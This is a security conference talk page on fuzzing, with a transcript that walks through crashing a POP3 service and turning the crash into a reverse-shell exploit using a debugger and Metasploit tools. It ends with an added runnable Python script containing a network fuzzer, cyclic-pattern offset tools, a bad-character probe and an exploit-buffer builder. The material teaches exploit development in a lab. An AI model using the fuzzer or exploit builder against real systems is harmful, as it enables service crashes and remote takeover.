
Fuzzing: Finding Your Own Bugs and 0days

BSides Calgary · 41:58 · 37 views · Published 2021-12
About this talk
Rodolpho Concorde walks through a fuzzing methodology for discovering vulnerabilities. The talk covers fuzzing targets (protocols, applications, file formats), attack types, dumb versus smart fuzzers, buffer overflow fundamentals, and live proof-of-concept demonstrations: crashing a POP3 service with an incrementing Python fuzzer, then turning the crash into a working reverse-shell exploit with Immunity Debugger and the Metasploit tools (pattern_create, pattern_offset, msfvenom).

Transcript [en]

Hello, everyone. Welcome aboard to my talk. I'm glad to be here with you all. My talk is about Fuzzing: Finding Your Own Bugs and 0days! My name is Rodolpho Concorde, but you can call me by my nickname, ROd0X. A little about me: I'm a penetration tester, an IT instructor, and an information security consultant for 13 years. I'm a Certified Ethical Hacker by EC-Council. I've already given talks at Hack In The Box, Arab Security Conference, MorterueloCON, Red Team Village, StackConf, BSides Athens, BSides Newcastle, BSides SATX, etc. I'm an author for Hakin9 magazine, about Stack Overflow, and for Pentest Magazine, about Covert Channel, From Fuzzing to Get a Shell, and From SEH Overwrite to Get a Shell. I leave here my LinkedIn profile and email for whoever wants to get in touch with me and clear up some doubts.

You can write to me at my LinkedIn profile or my email. Our agenda about fuzzing: we'll see types of targets, types of attacks, smart fuzzers, buffer overflows, and we have a PoC. Types of targets might be protocol, application or file format. Protocol: FTP, POP3, SMTP, Telnet, any protocol. Application: any input of any application. File format: any file format, like .MP3, .M3U, .MP4, etc., to test the software that reads it. Types of attacks: fuzzers will try combinations of attacks on numbers, chars, metadata and pure binary sequences; a list with a sequence of dangerous strings is sent to the target. And here we have some examples of the dangerous strings. Types of fuzzers: they might be dumb or smart fuzzers. Dumb: any string combination.

Smart fuzzing: smart fuzzers are programmed with knowledge of the input formats, i.e., a protocol definition or rules for a file format. They might be mutation, generation or evolutionary. Smart fuzzing is a long subject and we don't have time to get into it in depth. But I leave here the F-Secure website link with more information about smart fuzzing. Buffer overflow: a buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. It might be heap-based or stack-based. Heap-based: a place in memory which allocates a large amount of data dynamically. Stack-based: allocates a limited or fixed size of data, such as data from local variables or functions.

Here we have a buffer overflow code example. In this code, we have a variable buffer with a size of 5 bytes of data. And what is the problem with this code? The problem with this code is that it doesn't verify what it should do if someone inserts more than 5 bytes. So if someone inserts more than 5 bytes, an overflow occurs in the application. The application crashes because it isn't prepared for what happens if someone inserts more than 5 bytes. Now we will see a PoC: discover the input format to perform the fuzz. Example with the POP3 protocol. Here we see in this code a fuzzing script, a Python fuzzing script. We have here a variable buffer with the character A, and a variable counter at 100.

And we have here a connection to the target IP on port 110. And below we have the USER command and the PASS command. What will happen with this code? This code will send a large number of A characters against the target IP on port 110 and the PASS command. The USER and PASS commands are specified in the RFC 1081 document for the POP3 protocol. Other protocols use other commands. Each protocol has its own commands. We will send a large number of A characters against the PASS command with the objective of causing a crash in this application. So let's see the video PoC. In this video, we will see an NMAP command against the target IP to witness the open ports. As we can see, port 110 is open. The POP3 protocol is running on port 110.

Now let's see our Python fuzzing script. We will send A characters starting from 100 bytes and increasing. The objective is to cause a crash in this application. Let's run the Python fuzzing script. As we can see, 5,900 bytes were necessary to cause a crash in this application. Let's run the NMAP command again. Port 110 is now down because of our script. Here we have vulnerable software to download. I'll make the link to these slides available on my LinkedIn profile for whoever wants to see them again. Now we see another video PoC. We will open the vulnerable software in Immunity Debugger. In this PoC, we will teach how you can create your own exploit code made through fuzzing.

Sending a lot of characters to get a shell. This large number of characters will be loaded into the vulnerable software to cause a crash. We have an output file generated. We will use a tool called pattern_create from Metasploit to generate a large number of characters, length 50,000 bytes. We will copy these characters and paste them into our exploit code. The objective is to cause a crash in this vulnerable software. We use this to find the offset of the EIP register. Let's move our exploit code to the desktop and copy it to the victim VM. Open Immunity Debugger on the victim VM and run the vulnerable software. Attach the vulnerable software in the debugger and run it. Let's load the characters. We got a crash. Let's see the ESP and EIP registers.

We use the value in EIP to find the offset. The EIP register indicates the next address that the CPU will execute. We find an offset of 35,056 bytes. We use the pattern_offset tool from Metasploit to locate the offset. The junk is 35,056 A characters. The EIP register indicates the address and the ESP register contains the shellcode. Now we need to search for bad characters. Depending on the application, some characters are considered bad. Example: 0x00 is considered bad because it terminates a string copy. We load the characters 01 up to FF against the target. See if there is an error in the Immunity dump. Find the bad characters to avoid when we create our shellcode. Bad characters: 0x00, 0x0A. We use msfvenom to generate a reverse shell. Avoid the bad characters with the -b option.

Open the exploit code, paste the A characters for the junk, the jump address, some NOPs and the MSF shellcode. Put netcat listening on the victim VM. Load the exploit and witness the connection back. We got a shell! Let's check the IP and users. We have reverse shell access on the victim VM. Thank you everyone for watching. Now I'm open for questions. Thank you very much.
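The PoC workflow the speaker walks through (incrementing POP3 fuzzer, locating the EIP offset with a cyclic pattern, probing for bad characters, assembling junk + return address + NOPs + shellcode), written out as one runnable Python script. This is an added example for this page; it is not the speaker's script or slide code, and the pattern functions are a re-implementation of what Metasploit's pattern_create/pattern_offset do, included so the offset lookup can be followed offline. Assumed for illustration: the `fake_session` stand-in that "crashes" at 5,900 bytes (the figure quoted in the talk), the POP3 username `test`, and the placeholder return address `0x11223344`; in practice you would point `tcp_pop3_session` at the real target and take the JMP ESP address from the debugger.

```python
import socket
import string
import struct
from typing import Callable, Optional, Union

# --- 1. Incremental POP3 fuzzer: growing 'A' buffers as the PASS argument ---

def pass_payload(length: int) -> bytes:
    """POP3 PASS line carrying `length` 'A' bytes (RFC 1081/1939 syntax)."""
    return b"PASS " + b"A" * length + b"\r\n"

def fuzz_pop3(session: Callable[[bytes], None], start: int = 100,
              step: int = 100, limit: int = 20000) -> Optional[int]:
    """Send PASS buffers of start, start+step, ... until the service fails.

    `session` performs one full exchange (connect, USER, PASS) and must raise
    OSError when the target stops answering, which is what a crashed daemon
    looks like from outside (nmap then shows port 110 closed). Returns the
    length in use when the failure was seen; if the daemon died only after
    answering, the fatal buffer was one step earlier, so re-check by hand.
    """
    length = start
    while length <= limit:
        try:
            session(pass_payload(length))
        except OSError:
            return length
        length += step
    return None

def tcp_pop3_session(host: str, port: int = 110, user: bytes = b"test",
                     timeout: float = 5.0) -> Callable[[bytes], None]:
    """Real network session for fuzz_pop3 (not exercised offline; `user` is an
    assumed placeholder account name)."""
    def session(pass_line: bytes) -> None:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                              # +OK banner
            s.sendall(b"USER " + user + b"\r\n")
            s.recv(1024)
            s.sendall(pass_line)
            if not s.recv(1024):                      # EOF: server closed on us
                raise ConnectionResetError("no reply to PASS")
    return session

# --- 2. Cyclic pattern, as produced by Metasploit's pattern_create ---

_CYCLE = "".join(u + l + d for u in string.ascii_uppercase
                 for l in string.ascii_lowercase for d in string.digits)  # 20280 chars

def pattern_create(length: int) -> str:
    """Aa0Aa1Aa2... pattern. Every 4-byte window is unique within the first
    20280 chars; past that the pattern repeats, so an offset above 20280 is
    reported as its first occurrence (pattern_offset.rb behaves the same)."""
    return (_CYCLE * (length // len(_CYCLE) + 1))[:length]

def pattern_offset(eip: Union[int, str], length: int) -> Optional[int]:
    """Offset of the EIP value in the pattern. An int is the register value as
    shown by the debugger (x86 is little-endian, so it is unpacked as '<I');
    a str is a raw 4-char piece of the pattern."""
    needle = struct.pack("<I", eip).decode("ascii", errors="replace") \
        if isinstance(eip, int) else eip
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None

# --- 3. Bad-character probe and final buffer layout ---

def badchar_probe(exclude=(0x00,)) -> bytes:
    """0x00..0xFF minus bytes already known to be bad. Send it where the
    shellcode will land, compare the stack dump against it, drop each mangled
    byte and repeat until the dump matches the probe."""
    skip = set(exclude)
    return bytes(b for b in range(0x100) if b not in skip)

def build_exploit(offset: int, ret_addr: int, shellcode: bytes,
                  bad=(0x00, 0x0a), nops: int = 16) -> bytes:
    """junk | return address (JMP ESP) | NOP sled | shellcode. Refuses bad
    bytes in the address as well as the shellcode: msfvenom -b cleans only
    the shellcode, and a bad byte in the address corrupts EIP itself."""
    ret = struct.pack("<I", ret_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        hit = sorted(set(blob) & set(bad))
        if hit:
            raise ValueError(f"{name} contains bad byte(s): {[hex(b) for b in hit]}")
    return b"A" * offset + ret + b"\x90" * nops + shellcode

if __name__ == "__main__":
    # Constructed stand-in for the daemon so the loop runs offline: it "dies"
    # once the PASS argument reaches 5900 bytes, the figure from the talk.
    def fake_session(pass_line: bytes) -> None:
        if len(pass_line) - len(b"PASS \r\n") >= 5900:
            raise ConnectionResetError("daemon crashed")
    print("crash at", fuzz_pop3(fake_session))                      # 5900
    print("offset of EIP=0x41336141:", pattern_offset(0x41336141, 20))  # 9
    print("probe bytes:", len(badchar_probe((0x00, 0x0a))))          # 254
    # 0x11223344 is a placeholder, not a real JMP ESP address.
    print("exploit length:", len(build_exploit(35056, 0x11223344, b"\xcc" * 4)))
```

The split between `fuzz_pop3` and the `session` callable is what makes the crash loop testable without a target; the same loop drives the real socket session. When the offset reported for a 50,000-byte pattern is larger than 20,280, confirm it by resending with the four bytes after the junk replaced by a distinctive value (for example `BBBB`) and checking that EIP reads `0x42424242`.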